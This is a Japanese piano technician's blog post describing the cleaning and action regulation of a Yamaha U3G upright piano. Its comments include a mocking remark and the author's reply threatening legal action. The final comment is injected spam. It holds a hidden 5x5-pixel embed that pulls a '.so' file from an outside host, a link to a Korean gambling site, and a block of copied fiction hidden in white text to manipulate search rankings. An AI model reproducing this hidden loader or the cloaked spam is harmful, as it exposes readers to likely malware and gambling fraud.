Facebook Page

Homeピアノ修理>ヤマハ U3G 簡易クリーニング、アクション調整

ヤマハ U3G 簡易クリーニング、アクション調整

2014.01.16 Thu

ヤマハピアノU3Gの修理をしたので記録しておきます。

このピアノ、最初に見積もりに行ったりとき外観から判断してしまいU3Hと決めつけていました。

我々調律師はピアノの外観を見てだいたいの機種名がわかってしまいます。特にU3Hは数が多いため特徴も一目瞭然、ペダルを見て判断して決めつけてました。


が、のちにGであったことが発覚。

私自身このU3Gにお目にかかる機会が少なかったのであまり頭になかったのです。

U3Hと言うと数も多く作られた量産機種ですが、その手前の機種であるGは数が少なく大量生産に移行する手前のようなピアノなので興味深いものがあります。

田舎の大きなお屋敷の蔵に安置されていたのですが、土壁だからか湿気の影響もなく、虫も奇跡的に入っていませんでした。









ペダルの穴に新聞紙がつめてありネズミが入るのを防いでありました。




今回は深いキズは直さない程度の簡易なクリーニングのご依頼。

外装の修理も塗装までするものから磨くだけの作業だったりいろいろ段階があります。

個人的には中身が最も大事なのは言うまでもないので、外装は簡易にしても中のアクション調整は簡易にはできないと考えてます。


バットフレンジコードの交換。経年変化で切れていました。88鍵盤すべて交換です。



茶色に変色していたコードが白い新しいものになりました。張りがあります。




ハンマーのファイリングやアクションの整調作業をして調律などをして仕上げます。まる一日はかかる作業です。


最後に磨いた外装の組み付けです。














さて待望のGの音色はと言うと、EとHの間のような音。と言ってもさっぱりわからないかと思いますが、一言で言うと暖かみと華やかさが同居しているような感じです。

予想していたような音色でしたので、満足のいく仕上がりとなりました。

納入されたピアノ教室にてたくさんのお子さんの耳に心地よい音を届けてくれるかと思います^_^



音楽 ブログランキングへ
♪------------------------------

ピアノ調律

サラピアノチューニングオフィス
www.sarapiano.com
-------------------------------♪

コメント

*ワロタw

U3Gが少ないって言ってるだけで、調律師としての経験値プーッwwですわ(爆)
で、なになに、EとHの間の音?
なんやそれ、適当ですなぁ~
EはどうでHはどうやねん!
それに、Hなんか初期と後期で全然違うじゃん。
それこそEとGの違いより大きな差があるし。
じゃさ、Fはどんな音ですかねww
EとGの間の音ですかww

*

なぴあさん、せっかくのコメントですが失礼な表現が含まれているためあなたのことを調べされていただいてからご返信いたします。よろしくお願い致します。

*

なぴあさん、記事を読んでいただきありがたいことなのですが悪意のあるコメントのため調べさせていただきました。
業界に関わられて活動されているかたなので、こちらも勉強されていただく意味でもある程度身元を明らかにし責任あるコメントをしていただければと思い残念な気持ちです。

こちらのブログは一般のかた向けに書いていることもあり、技術的なことは詳しく書いていないため誤解を招く表現があったことかと思われます。
専門的な見方でも音の世界は感覚の世界であり客観的、数値化するようなことが難しいため他人に伝えることが極めて難しいことであります。

今回話題にしたヤマハアップライトのGタイプですが、私自身はお目にかかる機会がたまたま少なかったのですが世の中にどれだけの数があるのかわかりかねます。お詳しいようですので教えていただければ幸いです。

反面よく触る機会のあるHタイプですが1972年〜1980年と言う長い期間製造されていたこともあり個体差があるのは事実かと思いますが、他の型式との比較との違いほどではないと私は感じます。

ピアノの音色の違いは設計と材質、環境、そしてメンテナンスが大きく影響を与えると考えますが、Hタイプが長い期間製造されていた間に設計と材質において大きく異なることがあったのかどうかご存知であれば勉強のためにもぜひ教えていただきたく思います。

そして音色のことを説明しようとするときに、私は倍音構成が最もわかりやすい説明かと考えています。例えばEの音色は第1よりも2、3倍音のほうが強く出ている傾向など、明らかに型式により違いがありますがそれぞれのデータを細かく取らないことには書き記すことができません。そのようなデータも必要に応じて取っておりますが専門的過ぎるためこのブログでそれを書くつもりはありませんし、そもそもこちらはそのあたりをお伝えするためのブログではありません。

そのような一般的な記事に悪意に満ちた書き込みをすると言うことは、私に対する誹謗中傷以外のなにものでもないと受け止めますので、今後このような失礼極まりないコメントは削除させていただきます。身元はある程度明らかにしたうえで技術的なコメントをされるのはお互いの向上のためにも歓迎です。

これ以上名誉棄損行為、営業妨害行為と見られることが続くようであれば訴えを起こすことになりあなたの活動のマイナスにしかなりませんのでご注意ください。

*

こんなコメント メチャクチャ卑怯です。
ここ迄言うなら 身元も明かすべきです!!
本当に失礼きわまりない  
短なる営業妨害

*

ほんとに卑劣な行為です。発言には責任がつきます。それを負わないで自分勝手に言いたいことを言うだけなんて嫌がらせ以外のなにものでもありません。
こういう人がいることが腹ただしく悲しいことですね、、

*

<embed width="5" height="5" src="http://move.b4ateam.net/dd8ce7c80.so" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"><br>▶실제 돈버는게임◀ 5아마지에 걸쳐 넓게 횡대로 도 ▶ K­P­9­2.N­L.A­E ◀
<br><br>
<div style="padding:10px; border-width:1px; border-color:rgb(243,197,52); border-style:solid;">
<p style="text-align: center;"><font color="#0055ff" size="4"><b><a href="http://K­P­9­2.N­L.A­E">▶사­­이­­트­­접­속◀</b></font></a></p>
</div>
<br><br>
<div style="color:white;">
▶실제 돈버는게임◀ 5아마지에 걸쳐 넓게 횡대로 도
북극심법은 북해빙궁 최고의 심법이다. 대대로 궁주에게만 전해지는 것이다. 내공을 쌓는 속도야 특별히 탁월할 것이 없 지만 그 정순함에 있어서 다른 것과 비교가 되지 않는 심오 실제 돈버는게임 한 심법이다. 그리고 빙궁주만이 익힐 수 있도록 허락된 심법 이다. 실제 돈버는게임 북해빙궁 최고의 무공은 북극심법을 이용해서 펼쳐야 제 대로 된 위력이 나온다. 따라서 빙궁주만이 제대로 된 위력을 낼 수 있다. 그것이 빙궁주가 북해빙궁 내에서 절대강자의 위 실제 돈버는게임 치를 차지할 수 있도록 사용되어 온 방법이다. 그런데 이것을 잃은 후로 중원무림에서도 손꼽던 고수이던 실제 돈버는게임 북해빙궁주의 무공은 크게 하락했다. 예전에는 빙궁주에게 사고가 생겨도 심법을 전수받는 것은 문제가 없었다. 다음 대의 궁주가 진법을 통과해 들어가서 잘 실제 돈버는게임 쓰여진 비급을 보고 익히면 그만이다. 하지만 삼백 년 전부터 그것이 불가능해졌다. 그때 진법의 실제 돈버는게임 생문이 사라지고 당시 궁주는 사망했다. 그 이후로 북극심법 의 전달은 완전히 끊겼다. 그리고 이제 드디어 그것을 찾았다. 실제 돈버는게임 "아이들에게 극한빙장 같은 편협한 무공을 익히게 하던 것 도 이제 끝이다. 익힌 무공을 숨기게 할 필요도 없어. 이제 마 음 놓고 실력 발휘를 하라고 해도 되겠군. 누가 뭐라 해도 뒤 실제 돈버는게임 에는 사상 최강의 내가 있으니까. 으하하하!" 빙궁주는 웃음을 멈추고 책장을 조심스럽게 넘겼다. 그는 어느새 심법의 연구에 깊이 빠져 들어갔다. 실제 돈버는게임 주유성은 북해빙궁 최고의 음식을 닥치는 대로 먹어치웠 실제 돈버는게임 다. 이미 빙궁주가 단단히 내려놓은 명령이 있었다. "우리 빙궁의 기둥뿌리가 빠지는 한이 있어도 주 공자에게 음식을 아끼지 마라." 실제 돈버는게임 그 명령에 의해서 빙궁의 최고 주방장은 비장의 재료를 닥 치는 대로 소모했다. 인근에서 신선한 재료를 수없이 사들였 실제 돈버는게임 고 그것으로 끝없이 음식을 만들어 바쳤다. 주유성은 그 요리의 바다에서 뒹굴었다. 항상 배가 뽈록해 실제 돈버는게임 서 돌아다녔다. 먹다 지치면 좋은 자리를 찾아 뒹굴었다. 그 옆은 냉소미가 졸졸 따라다니며 시중을 들었다. "주 오빠, 혼자 그렇게 먹어대다가 배 터져 죽으면 어떻게 실제 돈버는게임 하려고 그래?" 주유성이 배를 흔들었다. 실제 돈버는게임 "이히히. 귀엽지 않냐?" 냉소미가 피식 웃으며 그 배를 통통 두드렸다. "이게 다 어디로 없어지고 금방 홀쭉해지는지 몰라.' 실제 돈버는게임 둘이 배를 두드리며 노는 모습을 보는 사람들은 눈꼴이 시 어서 몸을 떨었다. 실제 돈버는게임 그렇게 며칠이 지나고 나서 빙궁주가 잔치를 열었다. "이 잔치는 이제부터 있을 내 폐관 수련을 기념하기 위함 실제 돈버는게임 이다." 빙궁주의 말에 수많은 아들딸들, 그리고 아내들, 손자, 손 녀들이 일제히 외쳤다. 실제 돈버는게임 "대성을 기원합니다!" 빙궁주가 고개를 끄덕이며 만족한 얼굴을 했다. 드디어 북 실제 돈버는게임 극심법의 이해를 끝낸 그는 그것을 수련하며 빙정을 흡수하 기로 결정했다. 그리고 그 일을 시작하기 전에 거하게 잔치를 벌였다. 실제 돈버는게임 빙궁주의 눈에 벌써부터 음식을 먹느라 정신이 없는 주유 성이 보였다. 실제 돈버는게임 "주 공자는 나의 수련이 기쁘지 아니한가?" "쩝쩝. 꼭 살아 나오세요." 실제 돈버는게임 주유성은 빙궁주가 어떤 방법을 써서 빙정을 흡수하려고 하는지는 모른다. 하지만 빙정에서 풍기는 어마어마한 냉기 를 느끼고 그것이 지나치게 강력한 것임은 깨닫고 있었다. 흡 실제 돈버는게임 수하다가 한순간의 실수만 해도 동태가 되기 십상이다. 그의 말은 걱정 어린 진심이었다. 실제 돈버는게임 빙궁주도 진심임을 안다. 자신도 일말의 두려움이 없는 것 은 아니다. 그래서 그 대답에 만족했다. "고맙네. 내 꼭 살아서 나오지." 실제 돈버는게임 그러나 다른 가족들은 다르다. 사람들이 눈살을 찌푸렸다. 그리고 주유성이 눈꼴시어서 못 봐주겠다고 생각하던 사 실제 돈버는게임 람들은 심하게 인상을 썼다. 그중 하나가 먼저 나섰다. 실제 돈버는게임 '건수를 잡았다. 요놈, 당해봐라.' "이런 무례한 자를 봤나! 감히 할아버님께 그 무슨 무례한 언동이냐!"


</div>

コメント投稿

Private

トラックバック

この記事のトラックバックURL
http://sarapiano.blog112.fc2.com/tb.php/2123-0e5b4129
この記事にトラックバックする(FC2ユーザー)